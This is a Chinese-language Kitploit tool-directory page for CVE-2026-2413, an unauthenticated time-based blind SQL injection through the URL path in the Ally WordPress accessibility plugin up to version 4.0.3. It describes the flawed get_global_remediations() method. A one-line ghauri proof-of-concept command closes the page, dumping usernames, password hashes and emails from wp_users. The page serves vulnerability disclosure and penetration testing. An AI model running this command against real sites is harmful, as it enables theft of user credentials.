Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-2413 — Ally – Web 可访问性与可用性 <= 4.0.3 - 通过 URL 路径的未认证 SQL 注入 | Kitploit
工具/GitHubGitHub/randomrobbiebf/cve-2026-2413
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubrandomrobbiebf/cve-2026-2413

CVE-2026-2413

Ally – Web 可访问性与可用性 <= 4.0.3 - 通过 URL 路径的未认证 SQL 注入

查看仓库
5个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-2413

Ally – Web Accessibility & Usability <= 4.0.3 - 通过 URL 路径的未认证 SQL 注入

描述

Ally – Web Accessibility & Usability WordPress 插件在 4.0.3 及之前的所有版本中,存在通过 URL 路径触发的 SQL 注入漏洞。原因是 get_global_remediations() 方法对用户提供的 URL 参数转义不足,该参数未经正确的 SQL 上下文净化,直接拼接进 SQL JOIN 子句。虽然使用了 esc_url_raw() 来保证 URL 安全,但它无法阻止 SQL 元字符(单引号、括号)被注入。这使得未认证攻击者能够将额外的 SQL 查询附加到现有查询中,进而利用时间型盲注技术从数据库中提取敏感信息。利用此漏洞需要启用 Remediation 模块,而这要求插件已连接至 Elementor 账户。

详细信息

  • 类型:插件
  • Slug:pojo-accessibility
  • 受影响版本:
  • CVSS 分数:7.5
  • CVSS 评级:高
  • CVSS 向量:CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE:CVE-2026-2413

POC

root@kitploit:~
ghauri -u "http://localhost:9001/x*" --technique=E --dbms=mysql --batch --ignore-code 404 --skip-urlencode --prefix="'" --suffix="OR'" -D wordpress -T wp_users -C user_login,user_pass,user_email --dump
下载工具